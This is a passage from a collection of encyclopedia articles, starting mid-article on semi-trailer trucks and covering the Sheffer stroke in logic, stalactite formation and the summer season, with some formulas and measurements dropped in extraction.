turbulent air swirling under the trailer is a major source of aerodynamic drag. Three split skirt concepts were verified by the United States Environmental Protection Agency (EPA) to provide fuel savings greater than 5%, and four split skirt concepts had EPA-verified fuel savings between 4% and 5%. Skirted trailers are often combined with Underrun Protection Systems (underride guards), greatly improving safety for passenger vehicles sharing the road. Underride guard Underride protection systems can be installed at the rear, front and sides of a truck and the rear and sides of a trailer. A Rear Underrun Protection System (RUPS) is a rigid assembly hanging down from trailer's chassis, which is intended to provide some protection for passenger cars which collide with the rear of the trailer. Public awareness of this safeguard was increased in the aftermath of the accident that killed actress Jayne Mansfield on 29 June 1967, when the car she was in hit the rear of a tractor-trailer, causing fatal head trauma. After her death, the NHTSA proposed requiring a rear underride guard, also known as a Mansfield bar, an ICC bar, or a DOT bumper. The proposal to mandate rear underride guards was withdrawn in 1971 after strong lobbying and opposition by the trucking industry, and so they were not federally-mandated until 1996; that mandate did not go into effect until 1998. The bottom rear of the trailer is near head level for an adult seated in a car, and without the underride guard, the only protection for such an adult's head in a rear-end collision would be the car's windshield and A pillars. The front of the car goes under the platform of the trailer rather than making contact via the passenger car bumper, so the car's protective crush zone becomes irrelevant and air bags are ineffective in protecting the passengers. The underride guard provides a rigid area for the car to contact that is lower than the lip of the bonnet/hood, preventing the vehicle from squatting and running under the truck and ensuring that the vehicle's crush zones and engine block absorb the force of the collision. In addition to rear underride guards, truck tractor cabs may be equipped with a Front Underrun Protection System (FUPS) at the front bumper of the truck, if the front end is not low enough for the bumper to provide the adequate protection on its own. The safest tractor-trailers are also equipped with side underride guards, also called Side Underrun Protection System (SUPS). These additional barriers prevent passenger cars from skidding underneath the trailer from the side, such as in an oblique or side collision, or if the trailer jackknifes across the road, and helps protect cyclists, pedestrians and other vulnerable road users. In the 1969 proposal for rear underrride guards, the Federal Highway Administration indicated that, "It is anticipated that the proposed [rear underride guard] standard will be amended, after technical studies have been completed, to extend the requirement for underride protection to the sides of large vehicles". However, to date, a side underride guard mandate has yet to ever be proposed by the USDOT or NHTSA. In fact, for side underride guards, NHTSA has disregarded successful crash tests that stop a passenger vehicle from underriding a semitrailer, ignored recommendations, disregarded administrative petitions, and denied petitions.  In fact, for decades NHTSA has ignored credible scientific research on side underride guards and failed to take simple steps to stop these crashes. In Europe, side and rear underrun protection are mandated on all lorries and trailers with a gross weight of or more. Several US states and cities have adopted or are in the process of adopting truck side guards, including New York City, Philadelphia, and Washington DC. The NTSB has recommended that the National Highway Traffic Safety Administration (NHTSA) develop standards for side underride protection systems for trucks, and for newly manufactured trucks to be equipped with technology meeting the standards. In addition to safety benefits, these underride guards may improve fuel mileage by reducing air turbulence under the trailer at highway speeds. Another benefit of having a sturdy rear underride guard is that it may be secured to a loading dock with a hook to prevent "trailer creep", a movement of the trailer away from the dock, which opens up a dangerous gap during loading or unloading operations. Semi-truck manufacturers Current semi-truck manufacturers include: Asia-Pacific Ashok Leyland (India) BharatBenz (India) C&C Trucks (China) CAMC Hanma (China) China National Heavy Duty Truck Group (China) Dongfeng Trucks (China) Eicher Motors (India) FAW Group (China) Foton Motor (China) Fuso (Japan) Hino (Japan) Hyundai (South Korea) Isuzu (Japan) JAC Motors (China) Mahindra Truck and Bus Division (India) SAIC Hongyan (China) Shacman (China) Tata Daewoo (South Korea-India) Tata Motors (India) UD Trucks (Japan) XCMG Hanvan (China) Canada and United States Freightliner Hino (Canadian plant) Hyundai Translead Kenworth Mack Navistar Nikola Corporation Oshkosh Peterbilt Tesla Volvo Western Star Europe DAF Trucks Foden Iveco MAN Mercedes-Benz Renault Trucks Scania Sisu Volvo Other locations BMC (Turkey) Ford Otosan (Turkey) Kamaz (Russia) MAZ (Belarus) Volkswagen (Latin America, South Africa) Former semi-truck manufacturers include: Asia MotorWorks Caterpillar Crane Carrier Company Jelcz KrAZ Roman Tatra ZiL Driver's license A special driver's license is required to operate various commercial vehicles. Australia Truck drivers in Australia require an endorsed license. These endorsements are gained through training and experience. The minimum age to hold an endorsed license is 18 years, and/or must have held open (full) driver's license for minimum 12 months. The following are the heavy vehicle license classes in Australia: LR (Light Rigid) – Class LR covers a rigid vehicle with a GVM (gross vehicle mass) of more than 4.5 tonnes but not more than 8 tonnes. Any towed trailer must not weigh more than 9 tonnes GVM. Also includes vehicles with a GVM up to 8 tonnes which carry more than 12 adults including the driver and vehicles in Class C. MR (Medium Rigid) – Class MR covers a rigid vehicle with two axles and a GVM of more than 8 tonnes. Any towed trailer must not weigh more than 9 tonnes GVM. Also includes vehicles in Class LR. HR (Heavy Rigid) – Class HR covers a rigid vehicle with three or more axles and a GVM of more than 15 tonnes. Any towed trailer must not weigh more than 9 tonnes GVM. Also includes articulated buses and vehicles in Class MR. HC (Heavy Combination) – Class HC covers heavy combination vehicles like a prime mover towing a semi-trailer, or rigid vehicles towing a trailer with a GVM of more than 9 tonnes. Also includes vehicles in Class HR. MC (Multi Combination) – Class MC covers multi-combination vehicles like road trains and B-double vehicles. Also includes vehicles in Class HC. In order to obtain an HC License the driver must have held an MR or HR license for at least 12 months. To upgrade to an MC License the driver must have held a HR or HC license for at least 12 months. From licenses MR and upward there is also a B Condition which may apply to the license if testing in a synchromesh or automatic transmission vehicle. The B Condition may be removed upon the driver proving the ability to drive a constant mesh transmission using the clutch. Constant mesh transmission refers to crash box transmissions, predominantly Road Ranger eighteen-speed transmissions in Australia. Canada Regulations vary by province. A license to operate a vehicle with air brakes is required (i.e., normally a Class I, II, or III commercial license with an "A" or "S" endorsement in provinces other than Ontario). In Ontario, a "Z" endorsement is required to drive any vehicle using air brakes; in provinces other than Ontario, the "A" endorsement is for air brake operation only, and an "S" endorsement is for both operation and adjustment of air brakes. Anyone holding a valid Ontario driver's license (i.e., excluding a motorcycle license) with a "Z" endorsement can legally drive any air-brake-equipped truck-trailer combination with a registered- or actual-gross-vehicle-weight (i.e., including towing- and towed-vehicle) up to 11 tonnes, that includes one trailer weighing no more than 4.6 tonnes if the license falls under the following three classes: Class E (school bus—maximum 24-passenger capacity or ambulance), F (regular bus—maximum 24-passenger capacity or ambulance) or G (car, van, or small-truck). A Class B (any school bus), C (any urban-transit-vehicle or highway-coach), or D (heavy trucks other than tractor-trailers) license enables its holder to drive any truck-trailer combination with a registered- or actual-gross-vehicle-weight (i.e., including towing- and towed-vehicle) greater than 11 tonnes, that includes one trailer weighing no more than 4.6 tonnes. Anyone holding an Ontario Class A license (or its equivalent) can drive any truck-trailer combination with a registered- or actual-gross-vehicle-weight (i.e., including towing- and towed-vehicles) greater than 11 tonnes, that includes one or more trailers weighing more than 4.6 tonnes. Europe A category CE driving licence is required to drive a tractor-trailer in Europe. Category C (Γ in Greece) is required for vehicles over , while category E is for heavy trailers, which in the case of trucks and buses means any trailer over . Vehicles over —which is the maximum limit of B license—but under can be driven with a C1 license. Buses require a D (Δ in Greece) license. A bus that is registered for no more than 16 passengers, excluding the driver, can be driven with a D1 license. New Zealand In New Zealand, drivers of heavy vehicles require specific licenses, termed as classes. A Class 1 license (car license) will allow the driving of any vehicle with Gross Laden Weight (GLW) or Gross Combination Weight (GCW) of or less. For other types of vehicles the classes are separately licensed as follows: Class 2 – Medium Rigid Vehicle: Any rigid vehicle with GLW or less with light trailer of or less, any combination vehicle with GCW or less, any rigid vehicle of any weight with no more than two axles, or any Class 1 vehicle. Class 3 – Medium Combination Vehicle: Any combination vehicle of GCW or less, or any Class 2 vehicle. Class 4 – Heavy Rigid Vehicle: Any rigid vehicle of any weight, any combination vehicle which consists of a heavy vehicle and a light trailer, or any vehicle of Class 1 or 2 (but not 3). Class 5 – Heavy Combination Vehicle: Any combination vehicle of any weight, and any vehicle covered by previous classes. Class 6 – Motorcycle. Further information on the New Zealand licensing system for heavy vehicles can be found at the New Zealand Transport Agency. Taiwan The Road Traffic Security Rules (道路交通安全規則) require a combination vehicle driver license () to drive a combination vehicle (). These rules define a combination vehicle as a motor vehicle towing a heavy trailer, i.e., a trailer with a gross weight of more than . United States Drivers of semi-trailer trucks generally require a Class A commercial driver's license (CDL) to operate any combination vehicles with a gross combination weight rating (or GCWR) in excess of if the gross vehicle weight rating (GVWR) of the towed vehicle(s) is in excess of . Some states (such as North Dakota) provide exemptions for farmers, allowing non-commercial license holders to operate semis within a certain air-mile radius of their reporting location. State exemptions, however, are only applicable in intrastate commerce; stipulations of the Code of Federal Regulations (CFR) may be applied in interstate commerce. Also a person under the age of 21 cannot operate a commercial vehicle outside the state where the commercial license was issued. This restriction may also be mirrored by certain states in their intrastate regulations. A person must be at least 18 in order to be issued a commercial license. In addition, endorsements are necessary for certain cargo and vehicle arrangements and types; H – Hazardous Materials (HazMat or HM) – necessary if materials require HM placards. N – Tankers – the driver is acquainted with the unique handling characteristics of liquids tankers. X – Signifies Hazardous Materials and Tanker endorsements, combined. T – Doubles & Triples – the licensee may pull more than one trailer. P – Buses – Any Vehicle designed to transport 16 or more passengers (including the driver). S – School Buses – Any school bus designed to transport 11 or more passengers (including the driver). W – Tow Truck Role in trade Modern day semi-trailer trucks often operate as a part of a domestic or international transport infrastructure to support containerized cargo shipment. Various types of rail flat bed train cars are modified to hold the cargo trailer or container with wheels or without. This is called Intermodal or piggyback. The system allows the cargo to switch from highway to railway or vice versa with relative ease by using gantry cranes. The large trailers pulled by a tractor unit come in many styles, lengths, and shapes. Some common types are: vans, reefers, flatbeds, sidelifts and tankers. These trailers may be refrigerated, heated, ventilated, or pressurized, depending on climate and cargo. Some trailers have movable wheel axles that can be adjusted by moving them on a track underneath the trailer body and securing them in place with large pins. The purpose of this is to help adjust weight distribution over the various axles, to comply with local laws. Media Television 1960s TV series Cannonball NBC ran two popular TV series about truck drivers in the 1970s featuring actor Claude Akins in major roles: Movin' On (1974–1976) B. J. and the Bear (1978–1981) The Highwayman (1987–1988), a semi-futuristic action-adventure series starring Sam Jones, featuring hi-tech, multi-function trucks. Knight Rider, an American television show featured a semi-trailer truck called The Semi, operated by the Foundation for Law & Government (F.L.A.G.) as a mobile support facility for KITT. Also, in two episodes KITT faced off against an armored semi called Goliath. The Transformers, a 1980s cartoon featuring tractor-trailers as the Autobots' leader Optimus Prime (Convoy in Japanese version), their second-in-command Ultra Magnus, and as the Stunticons' leader Motormaster. Optimus Prime returned in the 2007 film. Trick My Truck, a CMT show features trucks getting 'tricked out' (heavily customized). Ice Road Truckers, a History Channel show charts the lives of drivers who haul supplies to remote towns and work sites over frozen lakes that double as roads. 18 Wheels of Justice, featuring Federal Agent Michael Cates (Lucky Vanous) as a crown witness for the mafia who goes undercover, when forced into it, to fight crime. Eddie Stobart: Trucks & Trailers, a UK television show showing the trucking company Eddie Stobart and its drivers. Highway Thru Hell, a Canadian reality TV show that follows the operations of Jamie Davis Motor Trucking, a heavy vehicle rescue and recovery towing company based in Hope, British Columbia. Films Duel, Steven Spielberg's 1971 film, features a Peterbilt 281 tanker truck as the villain White Line Fever, a 1975 Columbia Pictures film, starring Jan-Michael Vincent Smokey and the Bandit, a 1977 film featuring a number of trucks on the side of the bandit Convoy, a 1978 film directed by Sam Peckinpah, starring Kris Kristofferson Mad Max 2, George Miller's 1981 film, features the titular character driving a Mack R series truck Maximum Overdrive, Stephen King's 1986 film, featured big rigs as its primary homicidal villains Over the Top (1987 film), a 1987 film directed by Menahem Golan, starring Sylvester Stallone Black Dog, a 1998 film directed by Kevin Hooks, starring Patrick Swayze Prime Mover, a 2008 film directed by David Caesar Joy Ride, a 2001 film directed by John Dahl, starring Paul Walker and Steve Zahn Big Rig, a 2008 documentary film directed by Doug Pray Music "Convoy", a pop song by C. W. McCall, spurred sales of CB radios with an imaginary trucking story. The eighteen-wheeled truck was immortalized in numerous country music songs, such as the Red Sovine titles "Giddyup Go", "Teddy Bear" and "Phantom 309", and Dave Dudley's "Six Days on the Road". The thrash metal band, BigRig, was named after these trucks. Country song "Eighteen Wheels and a Dozen Roses", made popular in 1987 by singer-songwriter Kathy Mattea. "Roll On (Eighteen Wheeler)" by Alabama tells the story of a trucker who calls home to his family every night while out on the road. "Papa Loved Mama" by Garth Brooks is about a trucker and his wife. "Truck Drivin' Song" by "Weird Al" Yankovic tells the story of a female trucker, sung by a male with a deep voice. "Cold Shoulder" by Garth Brooks is about a trucker stuck on the side of the highway during a blizzard, fantasizing about being home with his wife. "Drivin' My Life Away" by Eddie Rabbitt, a former trucker, co-written with Even Stevens and David Malloy, sings of the life on the road. Video games and truck simulators 18 Wheels of Steel series American Truck Simulator Big Rigs: Over the Road Racing (2003) Euro Truck Simulator Euro Truck Simulator 2 Hard Truck (1998) MotorStorm and MotorStorm: Pacific Rift Rig 'n' Roll (2009) Rigs of Rods Podcasts Over the Road, a podcast series by Radiotopia on truck driving the North America / US
Technology
Motorized road transport
null
29388
https://en.wikipedia.org/wiki/Sheffer%20stroke
Sheffer stroke
In Boolean functions and propositional calculus, the Sheffer stroke denotes a logical operation that is equivalent to the negation of the conjunction operation, expressed in ordinary language as "not both". It is also called non-conjunction, or alternative denial (since it says in effect that at least one of its operands is false), or NAND ("not and"). In digital electronics, it corresponds to the NAND gate. It is named after Henry Maurice Sheffer and written as or as or as or as in Polish notation by Łukasiewicz (but not as ||, often used to represent disjunction). Its dual is the NOR operator (also known as the Peirce arrow, Quine dagger or Webb operator). Like its dual, NAND can be used by itself, without any other logical operator, to constitute a logical formal system (making NAND functionally complete). This property makes the NAND gate crucial to modern digital electronics, including its use in computer processor design. Definition The non-conjunction is a logical operation on two logical values. It produces a value of true, if — and only if — at least one of the propositions is false. Truth table The truth table of is as follows. Logical equivalences The Sheffer stroke of and is the negation of their conjunction By De Morgan's laws, this is also equivalent to the disjunction of the negations of and Alternative notations and names Peirce was the first to show the functional completeness of non-conjunction (representing this as ) but didn't publish his result. Peirce's editor added ) for non-disjunction. In 1911, was the first to publish a proof of the completeness of non-conjunction, representing this with (the Stamm hook) and non-disjunction in print at the first time and showed their functional completeness. In 1913, Sheffer described non-disjunction using and showed its functional completeness. Sheffer also used for non-disjunction. Many people, beginning with Nicod in 1917, and followed by Whitehead, Russell and many others, mistakenly thought Sheffer has described non-conjunction using , naming this the Sheffer stroke. In 1928, Hilbert and Ackermann described non-conjunction with the operator . In 1929, Łukasiewicz used in for non-conjunction in his Polish notation. An alternative notation for non-conjunction is . It is not clear who first introduced this notation, although the corresponding for non-disjunction was used by Quine in 1940. History The stroke is named after Henry Maurice Sheffer, who in 1913 published a paper in the Transactions of the American Mathematical Society providing an axiomatization of Boolean algebras using the stroke, and proved its equivalence to a standard formulation thereof by Huntington employing the familiar operators of propositional logic (AND, OR, NOT). Because of self-duality of Boolean algebras, Sheffer's axioms are equally valid for either of the NAND or NOR operations in place of the stroke. Sheffer interpreted the stroke as a sign for nondisjunction (NOR) in his paper, mentioning non-conjunction only in a footnote and without a special sign for it. It was Jean Nicod who first used the stroke as a sign for non-conjunction (NAND) in a paper of 1917 and which has since become current practice. Russell and Whitehead used the Sheffer stroke in the 1927 second edition of Principia Mathematica and suggested it as a replacement for the "OR" and "NOT" operations of the first edition. Charles Sanders Peirce (1880) had discovered the functional completeness of NAND or NOR more than 30 years earlier, using the term ampheck (for 'cutting both ways'), but he never published his finding. Two years before Sheffer, also described the NAND and NOR operators and showed that the other Boolean operations could be expressed by it. Properties NAND is commutative but not associative, which means that but . Functional completeness The Sheffer stroke, taken by itself, is a functionally complete set of connectives. This can be seen from the fact that NAND does not possess any of the following five properties, each of which is required to be absent from, and the absence of all of which is sufficient for, at least one member of a set of functionally complete operators: truth-preservation, falsity-preservation, linearity, monotonicity, self-duality. (An operator is truth-preserving if its value is truth whenever all of its arguments are truth, or falsity-preserving if its value is falsity whenever all of its arguments are falsity.) It can also be proved by first showing, with a truth table, that is truth-functionally equivalent to . Then, since is truth-functionally equivalent to , and is equivalent to , the Sheffer stroke suffices to define the set of connectives , which is shown to be truth-functionally complete by the Disjunctive Normal Form Theorem. Other Boolean operations in terms of the Sheffer stroke Expressed in terms of NAND , the usual operators of propositional logic are:
Mathematics
Mathematical logic
null
29390
https://en.wikipedia.org/wiki/Stalactite
Stalactite
A stalactite (, ; , ) is a mineral formation that hangs from the ceiling of caves, hot springs, or man-made structures such as bridges and mines. Any material that is soluble and that can be deposited as a colloid, or is in suspension, or is capable of being melted, may form a stalactite. Stalactites may be composed of lava, minerals, mud, peat, pitch, sand, sinter, and amberat (crystallized urine of pack rats). A stalactite is not necessarily a speleothem, though speleothems are the most common form of stalactite because of the abundance of limestone caves. The corresponding formation on the floor of the cave is known as a stalagmite. Formation and type Limestone stalactites The most common stalactites are speleothems, which occur in limestone caves. They form through deposition of calcium carbonate and other minerals, which is precipitated from mineralized water solutions. Limestone is the chief form of calcium carbonate rock which is dissolved by water that contains carbon dioxide, forming a calcium bicarbonate solution in caverns. The chemical formula for this reaction is: (s) + (l) + (aq) → This solution travels through the rock until it reaches an edge and if this is on the roof of a cave it will drip down. When the solution comes into contact with air the chemical reaction that created it is reversed and particles of calcium carbonate are deposited. The reversed reaction is: → + + An average growth rate is a year. The quickest growing stalactites are those formed by a constant supply of slow dripping water rich in calcium carbonate (CaCO3) and carbon dioxide (CO2), which can grow at per year. The drip rate must be slow enough to allow the CO2 to degas from the solution into the cave atmosphere, resulting in deposition of CaCO3 on the stalactite. Too fast a drip rate and the solution, still carrying most of the CaCO3, falls to the cave floor where degassing occurs and CaCO3 is deposited as a stalagmite. All limestone stalactites begin with a single mineral-laden drop of water. When the drop falls, it deposits the thinnest ring of calcite. Each subsequent drop that forms and falls deposits another calcite ring. Eventually, these rings form a very narrow (≈4 to 5 mm diameter), hollow tube commonly known as a "soda straw" stalactite. Soda straws can grow quite long, but are very fragile. If they become plugged by debris, water begins flowing over the outside, depositing more calcite and creating the more familiar cone-shaped stalactite. Stalactite formation generally begins over a large area, with multiple paths for the mineral rich water to flow. As minerals are dissolved in one channel slightly more than other competing channels, the dominant channel begins to draw more and more of the available water, which speeds its growth, ultimately resulting in all other channels being choked off. This is one reason why formations tend to have minimum distances from one another. The larger the formation, the greater the interformation distance. Pillars The same water drops that fall from the tip of a stalactite deposit more calcite on the floor below, eventually resulting in a rounded or cone-shaped stalagmite. Unlike stalactites, stalagmites never start out as hollow "soda straws". Given enough time, these formations can meet and fuse to create a speleothem of calcium carbonate known as a pillar, column, or stalagnate. Lava stalactites Another type of stalactite is formed in lava tubes while molten and fluid lava is still active inside. The mechanism of formation is the deposition of molten dripping material on the ceilings of caves, however with lava stalactites formation happens very quickly in only a matter of hours, days, or weeks, whereas limestone stalactites may take up to thousands of years. A key difference with lava stalactites is that once the lava has ceased flowing, so too will the stalactites cease to grow. This means that if the stalactite were to be broken it would never grow back. The generic term lavacicle has been applied to lava stalactites and stalagmites indiscriminately and evolved from the word icicle. Like limestone stalactites, they can leave lava drips onto the floor that turn into lava stalagmites and may eventually fuse with the corresponding stalactite to form a column. Shark tooth stalactites The shark tooth stalactite is broad and tapering in appearance. It may begin as a small driblet of lava from a semi-solid ceiling, but then grows by accreting layers as successive flows of lava rise and fall in the lava tube, coating and recoating the stalactite with more material. They can vary from a few millimeters to over a meter in length. Splash stalactites As lava flows through a tube, material will be splashed up on the ceiling and ooze back down, hardening into a stalactite. This type of formation results in an irregularly-shaped stalactite, looking somewhat like stretched taffy. Often they may be of a different color than the original lava that formed the cave. Tubular lava stalactites When the roof of a lava tube is cooling, a skin forms that traps semi-molten material inside. Trapped gases expansion forces lava to extrude out through small openings that result in hollow, tubular stalactites analogous to the soda straws formed as depositional speleothems in solution caves. The longest known is almost 2 meters in length. These are common in Hawaiian lava tubes and are often associated with a drip stalagmite that forms below as material is carried through the tubular stalactite and piles up on the floor beneath. Sometimes the tubular form collapses near the distal end, most likely when the pressure of escaping gases decreased and still-molten portions of the stalactites deflated and cooled. Often these tubular stalactites acquire a twisted, vermiform appearance as bits of lava crystallize and force the flow in different directions. These tubular lava helictites may also be influenced by air currents through a tube and point downwind. Ice stalactites A common stalactite found seasonally or year round in many caves is the ice stalactite, commonly referred to as icicles, especially on the surface. Water seepage from the surface will penetrate into a cave and if temperatures are below freezing, the water will form stalactites. They can also be formed by the freezing of water vapor. Similar to lava stalactites, ice stalactites form very quickly within hours or days. Unlike lava stalactites however, they may grow back as long as water and temperatures are suitable. Ice stalactites can also form under sea ice when saline water is introduced to ocean water. These specific stalactites are referred to as brinicles. Ice stalactites may also form corresponding stalagmites below them and given time may grow together to form an ice column. Concrete stalactites Stalactites can also form on concrete, and on plumbing where there is a slow leak and where there are calcium, magnesium or other ions in the water supply, although they form much more rapidly there than in the natural cave environment. These secondary deposits, such as stalactites, stalagmites, flowstone and others, which are derived from the lime, mortar or other calcareous material in concrete, outside of the "cave" environment, can not be classified as "speleothems" due to the definition of the term. The term "calthemite" is used to encompass these secondary deposits which mimic the shapes and forms of speleothems outside the cave environment. The way stalactites form on concrete is due to different chemistry than those that form naturally in limestone caves and is due to the presence of calcium oxide in cement. Concrete is made from aggregate, sand and cement. When water is added to the mix, the calcium oxide in the cement reacts with water to form calcium hydroxide (Ca(OH)2). The chemical formula for this is: + → Over time, any rainwater that penetrates cracks in set (hard) concrete will carry any free calcium hydroxide in solution to the edge of the concrete. Stalactites can form when the solution emerges on the underside of the concrete structure where it is suspended in the air, for example, on a ceiling or a beam. When the solution comes into contact with air on the underside of the concrete structure, another chemical reaction takes place. The solution reacts with carbon dioxide in the air and precipitates calcium carbonate. + → + When this solution drops down it leaves behind particles of calcium carbonate and over time these form into a stalactite. They are normally a few centimeters long and with a diameter of approximately . The growth rate of stalactites is significantly influenced by supply continuity of saturated solution and the drip rate. A straw shaped stalactite which has formed under a concrete structure can grow as much as 2 mm per day in length, when the drip rate is approximately 11 minutes between drops. Changes in leachate solution pH can facilitate additional chemical reactions, which may also influence calthemite stalactite growth rates. Records The White Chamber in the Jeita Grotto's upper cavern in Lebanon contains an limestone stalactite which is accessible to visitors and is claimed to be the longest stalactite in the world. Another such claim is made for a limestone stalactite that hangs in the Chamber of Rarities in the Gruta Rei do Mato (Sete Lagoas, Minas Gerais, Brazil). However, cavers have often encountered longer stalactites during their explorations. One of the longest stalactites viewable by the general public is in Pol an Ionain (Doolin Cave), County Clare, Ireland, in a karst region known as The Burren; what makes it more impressive is the fact that the stalactite is held on by a section of calcite less than . Etymology Stalactites are first mentioned (though not by name) by the Roman natural historian Pliny in a text which also mentions stalagmites and columns and refers to their formation by the dripping of water. The term "stalactite" was coined in the 17th century by the Danish Physician Ole Worm, who coined the word from the Greek word σταλακτός (stalaktos, "dripping") and the Greek suffix -ίτης (-ites, connected with or belonging to). Photo gallery
Physical sciences
Caves
Earth science
29392
https://en.wikipedia.org/wiki/Summer
Summer
Summer or summertime is the hottest and brightest of the four temperate seasons, occurring after spring and before autumn. At or centred on the summer solstice, daylight hours are the longest and darkness hours are the shortest, with day length decreasing as the season progresses after the solstice. The earliest sunrises and latest sunsets also occur near the date of the solstice. The date of the beginning of summer varies according to climate, tradition, and culture. When it is summer in the Northern Hemisphere, it is winter in the Southern Hemisphere, and vice versa. Etymology The modern English summer derives from the Middle English somer, via the Old English sumor. Timing From an astronomical view, the equinoxes and solstices would be the middle of the respective seasons, but sometimes astronomical summer is defined as starting at the solstice, the time of maximal insolation, often identified with 21 June or 21 December. By solar reckoning, summer instead starts on May Day and the summer solstice is Midsummer. A variable seasonal lag means that the meteorological centre of the season, which is based on average temperature patterns, occurs several weeks after the time of maximal insolation. The meteorological convention defines summer as comprising the months of June, July, and August in the northern hemisphere and the months of December, January, and February in the southern hemisphere. Under meteorological definitions, all seasons are arbitrarily set to start at the beginning of a calendar month and end at the end of a month. This meteorological definition of summer also aligns with the commonly viewed notion of summer as the season with the longest (and warmest) days of the year, in which daylight predominates. The meteorological reckoning of seasons is used in countries including Australia, New Zealand, Austria, Denmark, Russia and Japan. It is also used by many people in the United Kingdom and Canada. In Ireland, the summer months according to the national meteorological service, Met Éireann, are June, July and August. By the Irish calendar, summer begins on 1 May (Beltane) and ends on 31 July (Lughnasadh). Days continue to lengthen from equinox to solstice and summer days progressively shorten after the solstice, so meteorological summer encompasses the build-up to the longest day and a diminishing thereafter, with summer having many more hours of daylight than spring. Reckoning by hours of daylight alone, summer solstice marks the midpoint, not the beginning, of the seasons. Midsummer takes place over the shortest night of the year, which is the summer solstice, or on a nearby date that varies with tradition. Where a seasonal lag of half a season or more is common, reckoning based on astronomical markers is shifted half a season. By this method, in North America, summer is the period from the summer solstice (usually 20 or 21 June in the Northern Hemisphere) to the autumn equinox. Reckoning by cultural festivals, the summer season in the United States is traditionally regarded as beginning on Memorial Day weekend (the last weekend in May) and ending on Labor Day (the first Monday in September), more closely in line with the meteorological definition for the parts of the country that have four-season weather. The similar Canadian tradition starts summer on Victoria Day one week prior (although summer conditions vary widely across Canada's expansive territory) and ends, as in the United States, on Labour Day. In some Southern Hemisphere countries such as Brazil, Argentina, South Africa, Australia and New Zealand, summer is associated with the Christmas and New Year holidays. Many families take extended holidays for two or three weeks or longer during summer. In Australia and New Zealand, summer begins on 1 December and ends on 28 February (29 February in leap years). In Chinese astronomy, summer starts on or around 5 May, with the jiéqì (solar term) known as lìxià (立夏), i.e. "establishment of summer". Summer ends around 7 August, with the solar term of lìqiū (立秋, "establishment of autumn"). In southern and southeast Asia, where the monsoon occurs, summer is more generally defined as lasting from March, April, May and June, the warmest time of the year, ending with the onset of the monsoon rains. Because the temperature lag is shorter in the oceanic temperate southern hemisphere, most countries in this region use the meteorological definition with summer starting on 1 December and ending on the last day of February. Weather Summer is traditionally associated with hot or warm weather. In Mediterranean climates, it is also associated with dry weather, while in other places (particularly in Eastern Asia because of the monsoon) it is associated with rainy weather. The wet season is the main period of vegetation growth within the savanna climate regime. Where the wet season is associated with a seasonal shift in the prevailing winds, it is known as a monsoon. In the northern Atlantic Ocean, a distinct tropical cyclone season occurs from 1 June to 30 November. The statistical peak of the Atlantic hurricane season is 10 September. The Northeast Pacific Ocean has a broader period of activity, but in a similar timeframe to the Atlantic. The Northwest Pacific sees tropical cyclones year-round, with a minimum in February and March and a peak in early September. In the North Indian basin, storms are most common from April to December, with peaks in May and November. In the Southern Hemisphere, the tropical cyclone season runs from the start of November until the end of April with peaks in mid-February to early March. Thunderstorm season in the United States and Canada runs in the spring through summer but sometimes can run as late as October or even November in the fall. These storms can produce hail, strong winds and tornadoes, usually during the afternoon and evening. Holidays School breaks Schools and universities typically have a summer break to take advantage of the warmer weather and longer days. In almost all countries, children are out of school during this time of year for summer break, although dates vary. Many families will take holidays for a week or two over the summer, particularly in Southern Hemisphere Western countries with statutory Christmas and New Year holidays. In the United States, public schools usually end in late May in Memorial Day weekend, while colleges finish in early May. Public school traditionally resumes near Labor Day, while higher institutions often resume in mid-August. In England and Wales, school ends in mid-July and resumes again in early September. In Scotland, the summer holiday begins in late June and ends in mid-to-late August. Similarly, in Canada the summer holiday starts on the last or second-last Friday in June and ends in late August or on the first Tuesday of September, with the exception of when that date falls before Labour Day, in which case, ends on the second Tuesday of the month. In Russia, the summer holiday begins at the end of May and ends on 31 August. In the Southern Hemisphere, school summer holiday dates include the major holidays of Christmas and New Year's Day. School summer holidays in Australia, New Zealand and South Africa begin in early December and end in early February, with dates varying between states. In South Africa, the new school year usually starts during the second week of January, thus aligning the academic year with the Calendar year. In India, school ends in late April and resumes in early or mid-June. In Cameroon and Nigeria, schools usually start a summer vacation in mid-July and resume in the later weeks of September or the first week of October. Public holidays A wide range of public holidays fall during summer, including: Northern Hemisphere Bank holidays in the United Kingdom and Ireland Bastille Day, National Day of France (14 July) Belgian National Day (21 July) Canada Day (1 July) Festa della Repubblica, Italian national day and republic day (2 June) Independence Day (Jordan) (25 May) Independence Day (Pakistan) (14 August) Independence Day (India) (15 August) Independence Day (Indonesia) (17 August) Independence Day (Malaysia) (31 August) Independence Day (United States) (4 July) Juneteenth (United States) (19 June) King's Official Birthday (United Kingdom and some Commonwealth countries) (third Saturday in June) Memorial Day (United States) or Victoria Day (Canada) through Labor Day National Day of Singapore (9 August) National Day of Sweden (6 June) and Midsummer, sometimes referred to as the "alternative National Day" Ólavsøka, Faroe Islands (29 July) Swiss National Day (1 August) Victory Day (Turkey) (30 August) Southern Hemisphere Australia Day (26 January) Christmas Day (25 December) and Boxing Day (26 December) in many countries New Year's Day (1 January) and the following day (2 January) in many countries Waitangi Day (6 February) In New Zealand Activities People generally take advantage of the high temperatures by spending more time outdoors during summer. Activities such as travelling to the beach and picnics occur during the summer months. Sports including cricket, association football (soccer), horse racing, basketball, American football, volleyball, skateboarding, baseball, softball, tennis and golf are played. Water sports also occur. These include water skiing, wakeboarding, swimming, surfing, tubing and water polo. The modern Olympics have been held during the summer months every four years since 1896. The 2000 Summer Olympics, in Sydney, were held in spring and the 2016 Summer Olympics, in Rio de Janeiro, were held in winter. In the United States, many television shows made for children are released during the summer, as children are off school. Conversely, the music and film industries generally experience higher returns during the summer than other times of the year and market their summer hits accordingly. Summer is popular for animated movies to be released theatrically in movie theaters. With many schools closed, especially in Western countries, travel and vacationing tend to peak during the summer. Teenagers and university students often take summer jobs, and business activity for the recreation, tourism, restaurant, and retail industries reach their peak.
Physical sciences
Seasons
null
29394
https://en.wikipedia.org/wiki/Shrike
Shrike
